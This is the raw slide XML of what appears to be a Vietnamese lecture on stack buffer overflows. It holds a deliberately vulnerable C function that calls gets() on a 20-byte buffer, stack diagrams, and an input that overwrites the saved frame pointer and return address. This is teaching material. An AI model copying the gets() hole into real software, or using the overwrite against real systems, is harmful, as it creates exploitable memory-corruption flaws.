              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{276DC999-BB73-B98C-7A1F-99DB64563CC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8572500" y="3899173"/>
            <a:ext cx="5052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a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>SFP</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Google Shape;782;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAB768C9-B96A-C9FB-B493-E09C5641C1F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599" y="5377754"/>
            <a:ext cx="3668699" cy="11697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void vulnerable(void) {</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char name[20];</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gets(name);</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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Google Shape;840;p71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A7B0A00-82A8-7629-4156-E66BBA1C04F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="529204159"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4401792" y="3361480"/>
          <a:ext cx="1439950" cy="2438080"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2914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284566">
                <a:tc gridSpan="4">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>0xbfffcd5c</a:t>
                      </a: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284566">
                <a:tc gridSpan="4">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Courier New"/>
                        <a:ea typeface="Courier New"/>
                        <a:cs typeface="Courier New"/>
                        <a:sym typeface="Courier New"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45700" marR="45700" marT="45700" marB="457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92883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Hệ quả</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53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{058AEA23-1CC2-BE67-D211-30BF0EE973B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="641065694"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5896203" y="12192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latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>SFP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6" name="Google Shape;912;p76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C0DA7FF-F714-33D9-1DB3-FBCEE2A606F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="27446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3622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addl $4,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14" name="Group 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83D46E79-6492-0698-052A-BAC3752A519F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2286000" y="2744688"/>
            <a:ext cx="990600" cy="307736"/>
            <a:chOff x="2133600" y="3886200"/>
            <a:chExt cx="1143000" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55F984E3-2823-DB1A-8386-2B69A1FCF5F6}"/>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9" name="Google Shape;915;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FDAFAB1-100E-E0A1-6D6F-26FE424480F5}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Google Shape;914;p76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25BFEAA8-7AFC-4090-19B6-0EBFD9475205}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105399" y="57969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5949304"/>
            <a:ext cx="257402" cy="1468"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Google Shape;914;p76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5C7D2AC-118D-7A3C-5EFF-48D5F208A6C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105399" y="39609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113332"/>
            <a:ext cx="257402" cy="1468"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="Group 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{320C7990-3627-4409-FC43-BBCB05CAF925}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8610600" y="3505200"/>
            <a:ext cx="228600" cy="609600"/>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F4870C03-1E91-5072-185A-3B7A19F8FFA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105399" y="3810000"/>
            <a:ext cx="7764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0129FF-E73D-E166-8515-D8571993B74C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105399" y="3810000"/>
            <a:ext cx="0" cy="7634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E406676-C86F-04C0-5728-5D2CF7F7FDB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4495800" y="4573488"/>
            <a:ext cx="60959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491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Hệ quả</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5" name="Table 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{058AEA23-1CC2-BE67-D211-30BF0EE973B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3309963145"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5896203" y="1219200"/>
          <a:ext cx="2721206"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7498">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3">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solidFill>
                            <a:schemeClr val="bg2">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>(RIP)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="1155CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t> 0xbfffcd40</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bg2">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>(SFP)</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     </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>'AAAA'</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5770166"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Google Shape;912;p76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C0DA7FF-F714-33D9-1DB3-FBCEE2A606F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="27446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3622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addl $4,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14" name="Group 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83D46E79-6492-0698-052A-BAC3752A519F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2286000" y="2744688"/>
            <a:ext cx="990600" cy="307736"/>
            <a:chOff x="2133600" y="3886200"/>
            <a:chExt cx="1143000" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55F984E3-2823-DB1A-8386-2B69A1FCF5F6}"/>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9" name="Google Shape;915;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FDAFAB1-100E-E0A1-6D6F-26FE424480F5}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Google Shape;914;p76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25BFEAA8-7AFC-4090-19B6-0EBFD9475205}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105399" y="57969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5949304"/>
            <a:ext cx="257402" cy="1468"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Google Shape;914;p76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5C7D2AC-118D-7A3C-5EFF-48D5F208A6C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105399" y="39609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113332"/>
            <a:ext cx="257402" cy="1468"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="Group 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{320C7990-3627-4409-FC43-BBCB05CAF925}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8610600" y="609600"/>
            <a:ext cx="381000" cy="3503732"/>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923;p76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0EEF6FE-D6EC-D433-382F-C78015A75285}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1219200"/>
            <a:ext cx="26766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Đầu vào</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12</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'\x40\xcd\xff\xbf'</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10" name="Group 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1D5A8AA-B347-CCFC-530B-9EF0E3497463}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7806256" y="-76200"/>
            <a:ext cx="956744" cy="1234996"/>
            <a:chOff x="761773" y="198248"/>
            <a:chExt cx="1522825" cy="1965711"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 2" descr="Breezeeweezee Cosplay Blog">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2911FDE0-538F-BFBC-AF87-F017D4269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A6934-5136-4674-ECBC-68625BAC6699}"/>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F6962D-32AE-37A8-2C2D-BCD49C9F2F3A}"/>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446BEDB-9C42-2431-65FC-0EB1C6A17B59}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Google Shape;1033;p82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA7805CA-4CB0-6955-5422-789E4924188D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="176118" y="5007170"/>
            <a:ext cx="47244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Giá trị SFP (giá trị con trỏ EBP của hàm gọi) bị ghi đè bởi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'AAAA’</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>, do đó SFP trỏ tới (thường là không hợp lệ) địa chỉ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AAAA</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>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0x41414141</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83706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Hệ quả</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55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Google Shape;912;p76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C0DA7FF-F714-33D9-1DB3-FBCEE2A606F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="27446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3622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addl $4,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14" name="Group 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83D46E79-6492-0698-052A-BAC3752A519F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2293522" y="2937228"/>
            <a:ext cx="990600" cy="307736"/>
            <a:chOff x="2133600" y="3886200"/>
            <a:chExt cx="1143000" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55F984E3-2823-DB1A-8386-2B69A1FCF5F6}"/>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9" name="Google Shape;915;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FDAFAB1-100E-E0A1-6D6F-26FE424480F5}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Google Shape;914;p76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25BFEAA8-7AFC-4090-19B6-0EBFD9475205}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105399" y="57969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5949304"/>
            <a:ext cx="257402" cy="1468"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Google Shape;914;p76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5C7D2AC-118D-7A3C-5EFF-48D5F208A6C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105399" y="39609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113332"/>
            <a:ext cx="257402" cy="1468"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="Group 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{320C7990-3627-4409-FC43-BBCB05CAF925}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8610600" y="609600"/>
            <a:ext cx="381000" cy="3503730"/>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923;p76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0EEF6FE-D6EC-D433-382F-C78015A75285}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1219200"/>
            <a:ext cx="26766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Đầu vào</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12</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'\x40\xcd\xff\xbf'</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10" name="Group 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1D5A8AA-B347-CCFC-530B-9EF0E3497463}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7806256" y="-76200"/>
            <a:ext cx="956744" cy="1234996"/>
            <a:chOff x="761773" y="198248"/>
            <a:chExt cx="1522825" cy="1965711"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 2" descr="Breezeeweezee Cosplay Blog">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2911FDE0-538F-BFBC-AF87-F017D4269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A6934-5136-4674-ECBC-68625BAC6699}"/>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F6962D-32AE-37A8-2C2D-BCD49C9F2F3A}"/>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446BEDB-9C42-2431-65FC-0EB1C6A17B59}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Google Shape;1033;p82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
